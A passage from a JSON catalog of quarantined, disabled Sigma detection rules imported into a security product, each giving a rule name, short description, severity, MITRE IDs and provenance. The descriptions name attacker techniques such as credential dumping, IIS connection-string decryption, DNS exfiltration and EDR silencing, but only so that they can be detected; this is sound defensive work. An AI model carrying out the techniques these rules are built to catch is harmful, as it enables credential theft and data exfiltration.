"detections/sigma-imports/_quarantine/veeam-backup-servers-credential-dumping-script-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "976d6e6f-a04b-4900-9713-0134a353e38b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml" } }, { "id": "sigmahq-sigma-976dd1f2-a484-45ec-aa1d-0e87e882262b", "type": "detection", "name": "Potential Persistence Via CHM Helper DLL", "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-chm-helper-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_chm.yml" } }, { "id": "sigmahq-sigma-977ef627-4539-4875-adf4-ed8f780c4922", "type": "detection", "name": "Auditing Configuration Changes on Linux Host", "description": "Detect changes in auditd configuration files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, 
"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/auditing-configuration-changes-on-linux-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "977ef627-4539-4875-adf4-ed8f780c4922", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_auditing_config_change.yml" } }, { "id": "sigmahq-sigma-979baf41-ca44-4540-9d0c-4fcef3b5a3a4", "type": "detection", "name": "Potential File Extension Spoofing Using Right-to-Left Override", "description": "Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-file-extension-spoofing-using-right-to-left-override.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "979baf41-ca44-4540-9d0c-4fcef3b5a3a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml" } }, { "id": "sigmahq-sigma-97a80ec7-0e2f-4d05-9ef4-65760e634f6b", "type": "detection", "name": "Security Privileges Enumeration Via Whoami.EXE", "description": "Detects a whoami.exe executed with the /priv 
command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-privileges-enumeration-via-whoami-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_whoami_priv_discovery.yml" } }, { "id": "sigmahq-sigma-97aa2e88-555c-450d-85a6-229bcd87efb8", "type": "detection", "name": "Suspicious Screensaver Binary File Creation", "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-screensaver-binary-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "97aa2e88-555c-450d-85a6-229bcd87efb8", "source_commit": "df5c6a6", "license": 
"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml" } }, { "id": "sigmahq-sigma-97b9ce1e-c5ab-11ea-87d0-0242ac130003", "type": "detection", "name": "PSExec and WMI Process Creations Block", "description": "Detects blocking of process creations originating from PSExec and WMI commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-and-wmi-process-creations-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_asr_psexec_wmi.yml" } }, { "id": "sigmahq-sigma-97dbf6e2-e436-44d8-abee-4261b24d3e41", "type": "detection", "name": "Microsoft IIS Connection Strings Decryption", "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. 
An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-iis-connection-strings-decryption.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml" } }, { "id": "sigmahq-sigma-97de11cd-4b67-4abf-9a8b-1020e670aa9e", "type": "detection", "name": "Pnscan Binary Data Transmission Activity", "description": "Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.\nThis behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pnscan-binary-data-transmission-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "97de11cd-4b67-4abf-9a8b-1020e670aa9e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_pnscan_binary_cli_pattern.yml" } }, { "id": "sigmahq-sigma-97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d", "type": "detection", "name": "AWS New Lambda Layer Attached", "description": "Detects when a user attached a Lambda layer to an existing Lambda function.\nA malicious Lambda layer could execute arbitrary code in the context of the function's IAM role.\nThis would give an adversary access to resources that the function has access to.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-new-lambda-layer-attached.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_new_lambda_layer_attached.yml" } }, { "id": "sigmahq-sigma-9801abb8-e297-4dbf-9fbd-57dde0e830ad", "type": "detection", "name": "File Download And Execution Via IEExec.EXE", "description": "Detects execution of the IEExec utility to download and execute files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/file-download-and-execution-via-ieexec-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ieexec_download.yml" } }, { "id": "sigmahq-sigma-98054878-5eab-434c-85d4-72d4e5a3361b", "type": "detection", "name": "HackTool - EDRSilencer Execution - Filter Added", "description": "Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-edrsilencer-execution-filter-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98054878-5eab-434c-85d4-72d4e5a3361b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_hktl_edr_silencer.yml" } }, { "id": "sigmahq-sigma-980a7598-1e7f-4962-9372-2d754c930d0e", "type": "detection", "name": "Google Full Network Traffic Packet Capture", "description": "Identifies potential full network packet capture in gcp. 
This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1074" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-full-network-traffic-packet-capture.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "980a7598-1e7f-4962-9372-2d754c930d0e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_full_network_traffic_packet_capture.yml" } }, { "id": "sigmahq-sigma-9827ae57-3802-418f-994b-d5ecf5cd974b", "type": "detection", "name": "Potential Registry Persistence Attempt Via DbgManagedDebugger", "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. 
Which will get invoked when an application crashes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-registry-persistence-attempt-via-dbgmanageddebugger.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9827ae57-3802-418f-994b-d5ecf5cd974b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml" } }, { "id": "sigmahq-sigma-982e9f2d-1a85-4d5b-aea4-31f5e97c6555", "type": "detection", "name": "Suspicious WebDav Client Execution Via Rundll32.EXE", "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. 
This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-webdav-client-execution-via-rundll32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml" } }, { "id": "sigmahq-sigma-9847f263-4a81-424f-970c-875dab15b79b", "type": "detection", "name": "Suspicious TSCON Start as SYSTEM", "description": "Detects a tscon.exe start as LOCAL SYSTEM", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-tscon-start-as-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9847f263-4a81-424f-970c-875dab15b79b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tscon_localsystem.yml" } 
}, { "id": "sigmahq-sigma-98767d61-b2e8-4d71-b661-e36783ee24c1", "type": "detection", "name": "Gzip Archive Decode Via PowerShell", "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1132.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gzip-archive-decode-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98767d61-b2e8-4d71-b661-e36783ee24c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_decode_gzip.yml" } }, { "id": "sigmahq-sigma-98a96a5a-64a0-4c42-92c5-489da3866cb0", "type": "detection", "name": "DNS Exfiltration and Tunneling Tools Execution", "description": "Well-known DNS Exfiltration tools execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1048.001", "T1071.004", "T1132.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-exfiltration-and-tunneling-tools-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml" } }, { "id": "sigmahq-sigma-98b53e78-ebaf-46f8-be06-421aafd176d9", "type": "detection", "name": "HackTool - winPEAS Execution", "description": "WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1087", "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-winpeas-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98b53e78-ebaf-46f8-be06-421aafd176d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_winpeas.yml" } }, { "id": "sigmahq-sigma-98c3bcf1-56f2-49dc-9d8d-c66cf190238b", "type": "detection", "name": "NTLM Logon", "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1550.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntlm-logon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", "source_commit": "df5c6a6", "license": 
"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" } }, { "id": "sigmahq-sigma-98c5aeef-32d5-492f-b174-64a691896d25", "type": "detection", "name": "Service Security Descriptor Tampering Via Sc.EXE", "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-security-descriptor-tampering-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98c5aeef-32d5-492f-b174-64a691896d25", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_sdset_modification.yml" } }, { "id": "sigmahq-sigma-98dedfdd-8333-49d4-9f23-d7018cccae53", "type": "detection", "name": "Enable LM Hash Storage - ProcCreation", "description": "Detects changes to the \"NoLMHash\" registry value in order to allow Windows to store LM Hashes.\nBy setting this registry value to \"0\" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/enable-lm-hash-storage-proccreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98dedfdd-8333-49d4-9f23-d7018cccae53", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_nolmhash.yml" } }, { "id": "sigmahq-sigma-98ffaed4-aec2-4e04-9b07-31492fe68b3d", "type": "detection", "name": "VMMap Signed Dbghelp.DLL Potential Sideloading", "description": "Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vmmap-signed-dbghelp-dll-potential-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98ffaed4-aec2-4e04-9b07-31492fe68b3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_vmmap_dbghelp_signed.yml" } }, { "id": "sigmahq-sigma-991a9744-f2f0-44f2-bd33-9092eba17dc3", "type": "detection", "name": "Enable Windows Remote Management", "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). 
The adversary may then perform actions as the logged-on user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enable-windows-remote-management.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" } }, { "id": "sigmahq-sigma-992a6cae-db6a-43c8-9cec-76d7195c96fc", "type": "detection", "name": "Outbound Network Connection Initiated By Script Interpreter", "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. 
Adversaries may use script to download malicious payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outbound-network-connection-initiated-by-script-interpreter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_wscript_cscript_outbound_connection.yml" } }, { "id": "sigmahq-sigma-992dd79f-dde8-4bb0-9085-6350ba97cfb3", "type": "detection", "name": "New BgInfo.EXE Custom VBScript Registry Configuration", "description": "Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via \"BgInfo.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-bginfo-exe-custom-vbscript-registry-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "992dd79f-dde8-4bb0-9085-6350ba97cfb3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/registry/registry_set/registry_set_bginfo_custom_vbscript.yml" } }, { "id": "sigmahq-sigma-993c2665-e6ef-40e3-a62a-e1a97686af79", "type": "detection", "name": "Certificate Use With No Strong Mapping", "description": "Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID)\nThis could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping.\nEvents where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-use-with-no-strong-mapping.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "993c2665-e6ef-40e3-a62a-e1a97686af79", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml" } }, { "id": "sigmahq-sigma-994bfd6d-0a2e-481e-a861-934069fcf5f5", "type": "detection", "name": "Active Directory Certificate Services Denied Certificate Enrollment Request", "description": "Detects denied requests by Active Directory Certificate Services.\nExample of these requests denial include issues with permissions on the certificate template or invalid 
signatures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-certificate-services-denied-certificate-enrollment-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "994bfd6d-0a2e-481e-a861-934069fcf5f5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_certification_authority/win_system_adcs_enrollment_request_denied.yml" } }, { "id": "sigmahq-sigma-9976fa64-2804-423c-8a5b-646ade840773", "type": "detection", "name": "Suspicious Outbound SMTP Connections", "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-outbound-smtp-connections.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9976fa64-2804-423c-8a5b-646ade840773", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" } }, { "id": "sigmahq-sigma-99793437-3e16-439b-be0f-078782cf953d", "type": "detection", "name": "Tap Installer Execution", "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tap-installer-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99793437-3e16-439b-be0f-078782cf953d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tapinstall_execution.yml" } }, { "id": "sigmahq-sigma-99980a85-3a61-43d3-ac0f-b68d6b4797b1", "type": "detection", "name": "Google Cloud VPN Tunnel Modified or Deleted", "description": "Identifies when a VPN tunnel is modified or deleted in Google Cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, 